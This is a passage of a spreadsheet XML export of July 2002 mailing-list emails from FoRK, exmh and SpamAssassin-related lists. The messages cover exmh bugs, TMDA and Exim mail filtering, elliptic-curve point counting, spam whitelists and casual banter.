EUYa2E4z2HKjPw72q6hpkoWBFCVU15IpiZUJLBSBIcISgg95AERNc0wBdg0JADsAW2c9MFMLYpNc iieceQFtjSyUKwkAOw== ------=_NextPart_000_000F_01C23362.3939B510-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://xent.com</t>
  </si>
  <si>
    <t>To: "rODbegbie" &lt;rOD@arsecandle.org&gt;,\nFrom: John Andersen &lt;jsa@pen.homeip.net&gt;\nDate: Wed, 24 Jul 2002 21:13:25 -0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 21:13:25 -0800</t>
  </si>
  <si>
    <t>John Andersen &lt;jsa@pen.homeip.net&gt;</t>
  </si>
  <si>
    <t>"rODbegbie" &lt;rOD@arsecandle.org&gt;,</t>
  </si>
  <si>
    <t>Re: [Razor-users] Authentication Error</t>
  </si>
  <si>
    <t>On Wednesday 24 July 2002 08:42 am, rODbegbie wrote:\n&gt; rODbegbie wrote:\n&gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to\n&gt; &gt; mislead users into downloading the dev code in order to get more\n&gt; &gt; unwitting test sites.\n&gt;\n&gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I\n&gt; intended.\n&gt;\n&gt; As the old maxim goes, "Never ascribe to malice that which can be equally\n&gt; explained by incompetence".\n\nOh Yeah that sounds a WHOLE lot better... (chuckle).\n\n-- \n_________________________________________________\nNo I Don't Yahoo!\nAnd I'm getting pretty sick of being asked if I do.\n_________________________________________________\nJohn Andersen / Juneau Alaska\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Wed, 24 Jul 2002 20:55:02 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 20:55:02 -0700</t>
  </si>
  <si>
    <t>J C Lawrence &lt;claw@kanga.nu&gt;</t>
  </si>
  <si>
    <t>exmh-users@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: Folder computed replcomps (and replgroupcomps</t>
  </si>
  <si>
    <t>On Sun, 21 Jul 2002 16:37:21 -0500  Hal DeVore  wrote: &gt;&gt;&gt;&gt;&gt;&gt; On Fri, 19 Jul 2002, "J" == J C Lawrence wrote: J&gt; What would be great is if I could build the relevant comp file J&gt; dynamically at runtime. &gt; Sure.  Use the "folder change" hooks.  Create a proc named &gt; Hook_FolderChangeSomething (where "Something" is meaningful and likely &gt; to be unique in the universe just in case you distribute this to &gt; others).  Put the proc in a file in your ~/.tk/exmh directory, &gt; regenerate the tclIndex, restart exmh. &gt; In that proc you can do anything you want, like rewrite your &gt; ~/Mail/comp file. Yeah, that would work, tho there are race conditions and likely/possible ugly side effects (eg unintentionally left-over comp files).  I've ended up taking a very different route: TMDA ([URL]http://www.tmda.net[/URL]  In particular I use TMDA outbound filters to add custom plus addresses to the messages I send to specific lists. For example, for the tmda-users list I want a From: address of claw+tmda@kanga.nu, so the relevant outbound filter is:  to tmda-users@libertine.org ext=tmda which rewrites my From: header transparently.  When I get next month's batch of password reminders from Mailman lists I'll be running about resubscribing to each list either with a standard plus address or a TMDA-based sender address (ie an address which only the list in question is able to send mail to). 				  -+- Getting TMDA fully happy with nmh was a minor pain.   Reasons:   nmh, like MH, by default delivers outbound mail via SMTP to port 25 on   a defined host.  The port number cannot be configured (it calls   getservbyname() which does a lookup against "smtp" in /etc/services).   Ergo, you are constrained to use tell nmh to use tmda-sendmail instead   of SMTP.   Using sendmail as the delivery method under MH instead of SMTP is not   recommended as is loses a number of useful bits of robustness in mail   delivery failure modes.  Further, when nmh is configured to use   sendmail instead of SMTP nmh's whom tool calls sendmail as follows:     .../sendmail/ -m -t -i -bv   which creates problems:     Postfix does not support "-bv" and returns in error     Exim does not support "-t" with "-bv" and returns in error     Don't mention Qmail.  I won't use it.   "whom" is far too useful as a component tool in MH to lose.       It would be nice if someone gave the new crew working on nmh a shout     about this.  The "-bv" option to sendmail is pretty damned close to     being Allman sendmail specific and thus unfriendly to other MTAs.     Further there are many cases where it would be useful to configure a     non-standard port to deliver outbound mail to via SMTP.  nmh's     current insistence on only using port 25 (or as specified in     /etc/services) is a pain. I've worked out a hack to use TMDA with Exim while retaining nmh's "whom" support using Exim's system filter:   0) Make sure that the following options are set in ~/.tmda/config:     DATADIR     ALLOW_MODE_640     CRYPT_KEY_FILE     FINGERPRINT   1) chgrp everything in and under ~/.tmda to group "mail".   2) Configure Exim as per the current TMDA HOW-TO.   3) Set the following options in exim.conf:     message_filter = "/etc/exim/filter"     message_filter_pipe_transport = address_pipe   4) /etc/exim/filter reads:     # Exim filter     testprint "local_part: ${local_part: $h_From:}"     testprint "domain: ${domain: $h_From:}"     if "$h_X-tmda-fingerprint:" is "" and         "${domain: $h_From:}" is "kanga.nu" and        "${if exists {/home/${local_part:$h_From:}/.tmda} {true}{false}}" is "true"     then       pipe "/usr/bin/tmda-inject -c /home/${local_part:$h_From:}/.tmda/config"       finish     endif   Yes, that assumes that all user directories are under /home and that   they use ~/.tmda/config instead of ~/.tmdarc.  Hack appropriately for   your setup. Basic explanation:   Exim sends all outbound mail thru the system filter (if one is   configured) before attempting delivery.  The above system filter   extracts the user from the From: address and pipes the message thru   that user's TMDA setup via tmda-inject.   The system filter runs as the same user as Exim, thus the requirement   for the chgrp mail.  If your Exim installation runs as a different   user, chgrp as appropriate.   It should be fairly easy to do something similar under Postfix, but I   haven't investigated that end. Notes:   This requires that all outbound mail that is to be processed with TMDA   has a From: header which references a local user (suffixes are fine),   and that the From: address is fully qualified with a known domain.  If   you're vhosting the above setup would be fairly trivial to extend for   other domains and $HOME paths.  I'm not vhosting on my desktop and so   don't care.  You could also qualify on envelope or other headers if   you wish.   A nice side effect of this approach for those running shared mail   servers is that ALL users who have TMDA configs instantly get TMDA   support for their outbound mail -- and in a manner that is less   complex and less prone to end-user error than the typical TMDA   configuration. Caveat Emptor.     ObNote: I've also written a small patch against TMDA 0.58 to add a   "hold" delivery method (identical to "confirm" except it sends no   confirmation requests -- very useful for testing configs or doing   silent sidetracking of mail). --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.tmda.net http://www.kanga.nu https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Wed, 24 Jul 2002 20:06:13 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 20:06:13 +0200 (CEST)</t>
  </si>
  <si>
    <t>harley@argote.ch (Robert Harley)</t>
  </si>
  <si>
    <t>Re: My brain hurts</t>
  </si>
  <si>
    <t>More than a dozen jokes - thanks guys and girls!\n(plus some anti-French abuse from the usual suspect).\n\nWell my brain doesn't hurt so much any more, and it was well worth it.\nI've now got an even faster method for elliptic-curve point counting,\nboth pratically and asymptotically.\n\nIt lifts a curve over a field of degree n in time O(n^(2+1/2+eps)),\nor O(n^(2+eps)) with precomputation.  Before the best methods took\nO(n^(3+eps)) without precomputation, or O(n^(2+1/2+eps)) with it.\nThe precomputation is done once per field, not per curve, and takes\ntime O(n^(3+eps)).  Here eps is an arbitrarily small number, hiding\nsome logarithmic factors.\n\nAfter lifting, you compute a norm in time O(n^(2+1/3+eps)) to get the\nnumber of points on the curve.\n\nHere's an example over a 1009-bit field, without precomputation, using\na 1 GHz Pentium III:\n\n------------------------------------------------------------------------------\n&gt; ./ecpc4 -d 1009 -j 0x123\nINFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nINFO: -=-=-=-=-= ECPC: Elliptic Curve Point Counting, made easy! =-=-=-=-=-\nINFO: -=-=-=-=-= v4.0.0. (c) ArgoTech 2001. All rights reserved. =-=-=-=-=-\nINFO: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n[...]\nINFO: Picked field polynomial 1+x^55+x^1009.\nINFO: Starting ECPC on j = 0x123...\nINFO: Done after 138.33 seconds.\nINFO: Checking... OK OK OK OK OK OK OK OK OK OK\n[...]\nCURVE: 5486124068793688683255936251187209270074392635932332070112001988456197381759672947165175699536362793613284725337872111744958183862744647903224103718245568925556758419805069056847065147709058947190200192542277555125346128173135573355537502225974504428432790108988791795746287271944131683364548299056172016\n[...]\nINFO: 1 curve processed.\nINFO: Bye!\n------------------------------------------------------------------------------\n\n\nL8r,\n  Rob.\n     .-.                    Robert.Harley@argote.ch                    .-.\n    /   \           .-.      Software Development       .-.           /   \\n   /     \         /   \       .-.     _     .-.       /   \         /     \\n  /       \       /     \     /   \   / \   /   \     /     \       /       \\n /         \     /       \   /     `-'   `-'     \   /       \     /         \\n            \   /         `-'       ArgoTech      `-'         \   /\n             `-'                [URL]http://argote.ch[/URL]              `-'\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://argote.ch http://xent.com</t>
  </si>
  <si>
    <t>HUN</t>
  </si>
  <si>
    <t>To: Mike Masnick &lt;mike@techdirt.com&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Wed, 24 Jul 2002 19:30:16 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 19:30:16 +0200 (CEST)</t>
  </si>
  <si>
    <t>Eugen Leitl &lt;eugen@leitl.org&gt;</t>
  </si>
  <si>
    <t>Mike Masnick &lt;mike@techdirt.com&gt;</t>
  </si>
  <si>
    <t>Re: Mossberg on 'ChoiceMail': "In my tests, it cut my spam to zero."</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, Mike Masnick wrote:\n\n&gt; Adds to the level of annoyance, and makes it even less likely that I'll\n&gt; ever use it.\n\nWhich annoyance? A string like f70539bb32961f3d7dba42a9c51442c1218a9100\nsomewhere in the message inserted by the system automatically doesn't \nchange anything. Besides, there are simpler solutions:\n\n	[URL]http://tmda.net[/URL]\n \n&gt; They don't have to.  All they have to do is use some program (which, if\n&gt; they don't exist already, will certainly be around someday soon) that makes\n&gt; every spam they send show the recipient as the "from" address as well.\n\nSee above.\n \n&gt; The adding manually thing doesn't seem like much fun.  And, anytime I speak\n\nSo is installing the software. But you do it once.\n\n&gt; to someone new, it just makes it more unlikely that they will be willing to\n&gt; contact me.  Having played around with whitelists in the past, you'd be\n\n	[URL]http://tmda.net[/URL]\n\n&gt; amazed at how confused many people get by them as well.  They tend to\n&gt; ignore the "please apply" messages.\n&gt; \n&gt; As an aside, am I the only person around who simply does not use the\n&gt; addressbook feature in email programs?  I never have, and I don't see any\n\nI usually don't use it. Just to lookup addresses/names of people I forget, \nonce in a while.\n\n&gt; reason to.  It (along with not opening attachments) has helped me not to\n&gt; send out viruses to people.  I generally use my own brain or my inbox as an\n\nViruses? Other people's problem. Last virus I had was in 1988, or so.\n\n&gt; addressbook, and search out the last email I received from someone and hit\n&gt; reply...\n&gt; \n&gt; &gt;&gt; email.  I could see certain friends of mine getting fairly annoyed\n&gt; &gt;&gt; (especially those with multiple email addresses...).\n&gt; &gt;\n&gt; &gt;What's the point of multiple email addresses? They're a pain.\n&gt; \n&gt; Well, yes.  *I* use one email address, but that doesn't mean all my friends\n&gt; do.  You would need to convince everyone I know of that.  Most people I\n\nMaybe your friends should get used to tagged message delivery, then.\n\n&gt; know, at the very least, have a home and work email address.  But plenty\n&gt; others have other addresses for various reasons.  Keeping track of all of\n&gt; them for a whitelist seems like a pain.  It forces them to remember which\n&gt; email addresses are already approved and avoid using others.\n\nYou have strange friends.\n \n&gt; Plus, I know plenty of people who change jobs, and suddenly get a new email\n&gt; address from their new job.  Wouldn't it suck if, in sending out your new\n\nWhy should changing my job change my private address? I don't use \ncorporate mail for private purposes.\n\n&gt; job info, you had to fill out a new application for each friend just to\n&gt; tell them about your new job email address?\n\nI don't think this is a significant problem in practice.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://tmda.net http://tmda.net http://xent.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nDate: Wed, 24 Jul 2002 18:33:23 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 18:33:23 -0700</t>
  </si>
  <si>
    <t>"Gordon Mohr" &lt;gojomo@usa.net&gt;</t>
  </si>
  <si>
    <t>Re: Asteroids anyone ?</t>
  </si>
  <si>
    <t>With enough warning, you might not even care about trying to divert \nthe meteor -- you'd divert the Earth instead.\n\nI recall reading many years ago about calculations, done separately\nboth by US and USSR scientists for different reasons, about the\neffect of nuclear explosions on the moon's mass, and thus its orbit,\nand thus also (over time) the Earth's path around the sun.\n\nI believe the conclusion was that mild changes in the moon's \ncomposition would have the effect, over several years, of changing \nsignificantly where the Earth would be at any certain future point. \n\nVoila! No collision -- at least not with the initial threat. And\nno need to travel out to anywhere near the meteor, either. Just\nthe moon.\n\n- Gordon\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Wayne Baisley &lt;baisley@alumni.rice.edu&gt;\nDate: Wed, 24 Jul 2002 17:39:47 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:39:47 -0500</t>
  </si>
  <si>
    <t>Wayne Baisley &lt;baisley@alumni.rice.edu&gt;</t>
  </si>
  <si>
    <t>Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)</t>
  </si>
  <si>
    <t>&gt; There are so many good musician jokes.\n\nYoung Lutheran's Guide To The Orchestra\n\nCheers,\nWayne\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Hess, Mtodd, /mth" &lt;mth@Ingersoll.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 24 Jul 2002 17:14:07 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:14:07 +0100</t>
  </si>
  <si>
    <t>"Hess, Mtodd, /mth" &lt;mth@Ingersoll.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Graphics-only spam?</t>
  </si>
  <si>
    <t>"Hess, Mtodd, /mth" said:\n\n&gt; I hate to bring this up, but I see more and more spams that contain very\n&gt; little, if any, text.  Instead, most of the spam text is in a graphic image.\n&gt; How will we be able to detect those as spam?  OCR?\n\nor, alternatively, giveaway patterns in the HTML?  That's what's happening\nwith most obfuscating techniques the spammers are trying -- they become\na very reliable sign of spam in themselves!\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Karl Anderson &lt;kra@monkey.org&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 24 Jul 2002 17:13:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:13:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tom &lt;tomwhore@slack.net&gt;</t>
  </si>
  <si>
    <t>Karl Anderson &lt;kra@monkey.org&gt;</t>
  </si>
  <si>
    <t>Re: [Baseline] Raising chickens the high-tech way</t>
  </si>
  <si>
    <t>On 24 Jul 2002, Karl Anderson wrote:\n\n--]An interesting idea I heard of was to use gene maps &amp; genetic info\n--]about animals to guide the breeding process - essentially shortening\n--]the iteration time with genetic information, but not touching any\n--]genes themselves.\n\nThats where the gentic Purists bredding program was heading. Hitler wet\nhimslef when his big brains laid out the plan of forced natural selection,\nimages of strong young blonde boys marching around him sent him off in a\ndouble nostil coke blow frenzy..\n\nOf course back then they did not have the fine tuned maps we got today.\nMacromap wise we got the host of gps angles over head beaming the answeres\nin  feet to our "where are we now" musings, micromap wise we now have the\nability to spot the "will laugh at the goon shows" switch"\n\nAll the early genticpurists had to go on was hkull size, hair color and\nschlongalongadingdangage.\n\nAS always the probelm is not that we can do this , its what we do with it.\n\n-tomwsmf\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1027978302.cb328a@DeepEddy.Com&gt;\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 24 Jul 2002 17:13:03 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:13:03 -0500</t>
  </si>
  <si>
    <t>Hal DeVore &lt;haldevore@acm.org&gt;</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1027978302.cb328a@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: [fwd: error exmh 2.5 07/13/2001 ]</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Wed, 24 Jul 2002, "Chris" == Chris Garrigues wrote:\n\n  Chris&gt; Am I the only one for whom typing control-L to the main\n  Chris&gt; window causes this error?\n\nGetting it here too on a copy I haven't updated from CVS since \nabout May sometime.\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Wed, 24 Jul 2002 17:06:49 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 17:06:49 -0700</t>
  </si>
  <si>
    <t>Dave Long &lt;dl@silcom.com&gt;</t>
  </si>
  <si>
    <t>&gt; &gt; Unless your parents were selectively bred like livestock to produce you, \n&gt; &gt; I don't think you can make that case...  :-)\n&gt;\n&gt; I'm saying that my parents selected each other, and that they did so\n&gt; because (among other reasons) each wanted the other's genes to be\n&gt; mixed with their own in the offspring that they were planning.\n&gt;\n&gt; What does it matter that they were selecting to produce their own\n&gt; offspring, rather than the offspring of two unrelated animals?\n\nThat doesn't matter.  What does matter\nis that they were going on phenotypes,\nand didn't engineer the genetics.  That\nexample makes a good case for natural\nselection, but not for artificial.\n\n(do "married people live longer" because\nof the benefits of matrimony, or because\nacceptable health is one of the qualities\nselected for in spouses?)\n\nOf course, if there are FoRKs with six\nor fewer biological great grandparents\n(or who are offspring of Wilt) I should\neat my words; otherwise, the micro/macro\ndistinction seems much more relevant.\n\n-Dave\n\n&gt; I guess that the reason that I disagree is that some groups arguing\n&gt; against any checks on genetic engineering use that same argument -\n&gt; "we've been doing it since prehistory, so we don't need to apply any\n&gt; caution today".\n\nOne can also view that argument as a case\nfor checks: livestock owners have, over a\nperiod of millenia, altered the genetics\nof their herds to be dumber, meatier, and\nmore tolerant of industrial living, so if\ncaution is in order, they are some of the\nleast likely people to volunteer it.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Luis Villa &lt;louie@ximian.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 24 Jul 2002 16:55:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:55:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Luis Villa &lt;louie@ximian.com&gt;</t>
  </si>
  <si>
    <t>RE: USA USA WE ARE NUMBER ....six.</t>
  </si>
  <si>
    <t>On 24 Jul 2002, Luis Villa wrote:\n\n--]The report, apparently, makes that point as well. Tom seems to have\n--]taken things a slight bit out of context. :)\n\nI was simply posting, I did nto even comment of the fsking thing. So back\nthe F off biotches.\n\nJezz, add too much and they jump on you , dont add anything but your name\nand they fill in thier own versions....Two fingers in the air.\n\nI LOVE YOU ALL.\n\n-tom\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 24 Jul 2002 16:53:40 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:53:40 -0400 (EDT)</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, Elias Sinderson wrote:\n\n--]Sorry, Karl, your confusing things. Thos is saying that selective\n--]breeding should be counted as genetic engineering, whereas you are\n--]extending his definition to include the attration that your parents felt...\n\nThe grain is this.......\n\nSelective breeding, cross polinization, ie  is a MACROgenetic activites.\nYour dealing with big structures like whole sheep, plants, seed etc.\n\nManipulating the actual DNA, protein sequences, etc etc is a MICROgenetic\nactivity.\n\nMACROgenetic activites have decades on decades of testing...\nMICROgentic  activities DO NOT.\n\n\nYou guys get the point yet, or do you want to play another round of\nObscura Detalist Retardo?\n\n-tom\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Kevin.Christian@lsil.com\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 24 Jul 2002 16:46:08 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:46:08 -0500</t>
  </si>
  <si>
    <t>Kevin.Christian@lsil.com</t>
  </si>
  <si>
    <t>--==_Exmh_601800448P\nContent-Type: text/plain; charset=us-ascii\n\nF&gt; From:  kchrist@lsil.com\n&gt; Date:  Wed, 24 Jul 2002 15:41:04 -0600\n&gt;\n&gt; I think you are referring to a problem I noticed last October (see \n&gt; attached email). If I remember correctly, the binding for SeditBeautify\n&gt; is being applied outside of the sedit window and that results in the \n&gt; behavior observed.\n&gt;\n&gt; Subject: SeditBeautify bug\n&gt; Date: Tue, 02 Oct 2001 15:00:16 -0600 (16:00 CDT)\n&gt; From: kchrist@lsil.com\n&gt; \n&gt; It appears that the binding for SeditBeautify applies to\n&gt; more than just the sedit window. Since SeditBeautify assumes\n&gt; we are in a sedit window the routine fails. (Try typing\n&gt; ctrl-l over the main window to see what I mean).\n&gt; \n&gt; The quick fix for this is to make the ^l more restrictive. However, I'd\n&gt; suggest keeping things the way the are and extending ^l to be a\n&gt; highlight toggle. If the window is currently highlighted (sedit or msg)\n&gt; re-display without highlighting and vice versa.\n&gt; \n&gt; While I can hack tcl, hacking tk is another story. Translation: I can't \n&gt; fix this bug myself. Any volunteers?\n\nThat's clearly the same bug.\n\nI don't think I can fix it either...I certainly can't while my copy of Brent's \nbook is across town.  I do understand parts of tk fairly well, but the \nevent handlers give me a headache.\n\nChris\n\n-- \nChris Garrigues                 [URL]http://www.DeepEddy.Com[/URL]\nvirCIO                          [URL]http://www.virCIO.Com[/URL]\n716 Congress, Suite 200\nAustin, TX  78701		+1 512 374 0500\n\n  World War III:  The Wrong-Doers Vs. the Evil-Doers.\n\n\n\n\n--==_Exmh_601800448P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Exmh version 2.2_20000822 06/23/2000\n\niD8DBQE9PyAgK9b4h5R0IUIRAs7bAJ9uQUJ4MYEZf0/e6PuGSFSok9k1EQCfQxea\ndhHEFQpPCkqmstOtLRrRcz0=\n=RSdo\n-----END PGP SIGNATURE-----\n\n--==_Exmh_601800448P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;garym@canada.com&gt;\nFrom: &lt;bitbitch@magnesium.net&gt;\nDate: Wed, 24 Jul 2002 16:45:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:45:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;bitbitch@magnesium.net&gt;</t>
  </si>
  <si>
    <t>&lt;garym@canada.com&gt;</t>
  </si>
  <si>
    <t>&gt; &gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book &gt; early, avoid the rush. Hey, meybee by then, Bush's grand plan for a missle defense system will actually pan out and -work- ... I'm not holding my breath, but i'm not going to panic for something thats a little under 17 years away, either. -c &gt; &gt; -- &gt; Gary Lawrence Murphy  TeleDynamics Communications &gt; Inc Business Innovations Through Open Source Systems: &gt; [URL]http://www.teledyn.com[/URL] "Computers are useless.  They can only give you &gt; answers."(Pablo Picasso) &gt; &gt; [URL]http://xent.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.teledyn.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 24 Jul 2002 16:31:40 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:31:40 -0500</t>
  </si>
  <si>
    <t>[fwd: error exmh 2.5 07/13/2001 ]</t>
  </si>
  <si>
    <t>--==_Exmh_566017948P Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0" Content-Id: &lt;524.1027546300.0@deepeddy.com&gt; ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: &lt;524.1027546300.1@deepeddy.com&gt; Am I the only one for whom typing control-L to the main window causes this  error? I can't figure out why it occurs. Chris ------- =_aaaaaaaaaa0 Content-Type: message/rfc822 Content-ID: &lt;524.1027546300.2@deepeddy.com&gt; Content-Description: forwarded message Return-Path:  Delivered-To: cwg-exmh@deepeddy.com Received: (qmail 17767 invoked from network); 24 Jul 2002 21:29:14 -0000 Received: from localhost (HELO deepeddy.vircio.com) ([127.0.0.1]) (envelope-sender )           by localhost (qmail-ldap-1.03) with SMTP           for ; 24 Jul 2002 21:29:14 -0000 To: cwg-exmh@deepeddy.com Subject: error exmh 2.5 07/13/2001 Date: Wed, 24 Jul 2002 16:29:12 -0500 From: Chris Garrigues  Message-ID: &lt;1027546154.17532.TMDA@deepeddy.vircio.com&gt; X-Delivery-Agent: TMDA/0.57   Wed Jul 24 16:29:12 CDT 2002 cwg got an error Exmh version 2.5 07/13/2001 TK version 8.3.3 TCL version 8.3.3 Linux deepeddy.vircio.com 2.4.18-ac2v5 #1 SMP Sun Mar 31 07:41:15 CST 2002 i686 unknown bad text index "header + 1 line"     while executing "$t index "header + 1 line""     (procedure "SeditBeautify" line 3)     invoked from within "SeditBeautify .msg.t"     (command bound to event) ------- =_aaaaaaaaaa0 Content-Type: text/plain; charset="us-ascii" Content-ID: &lt;524.1027546300.3@deepeddy.com&gt; --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. ------- =_aaaaaaaaaa0-- --==_Exmh_566017948P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Pxy8K9b4h5R0IUIRAnOgAJ0Uw/GSsuOnUXG7x5WtJOJIYYweqgCghNc3 9HJtUPNX1D90p7rGch2Ry38= =0Che -----END PGP SIGNATURE----- --==_Exmh_566017948P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Lucas Gonze &lt;lgonze@panix.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 24 Jul 2002 16:10:15 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 16:10:15 -0500 (CDT)</t>
  </si>
  <si>
    <t>Lucas Gonze &lt;lgonze@panix.com&gt;</t>
  </si>
  <si>
    <t>Whatcha call the guy who hangs out with the band?  \nThe drummer.\nC\n\nOn Wed, 24 Jul 2002, Lucas Gonze wrote:\n\n&gt; \n&gt; Music school jokes --\n&gt; \n&gt; American conductor and European conductor are talking.  European conductor \n&gt; says "what a week, I've had 5 rehearsals and a performance."  "That's \n&gt; nothing," says the American conductor, "I've had five performances and a \n&gt; rehearsal."  \n&gt; \n&gt; What's the difference between a spring in the desert surrounded by palm \n&gt; trees and a violist that plays in tune?  A violist that plays in tune is a \n&gt; mirage.\n&gt; \n&gt; What's the difference between a rat and a guitar player?  The rat's got \n&gt; something to do tonight.\n&gt; \n&gt; Good thing it's not comedy school.\n&gt; \n&gt; \n&gt; \n&gt; [URL]http://xent.com[/URL]\n&gt; \n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1027978302.cb328a@DeepEddy.Com&gt;\nFrom: kchrist@lsil.com\nDate: Wed, 24 Jul 2002 15:41:04 -0600</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:41:04 -0600</t>
  </si>
  <si>
    <t>kchrist@lsil.com</t>
  </si>
  <si>
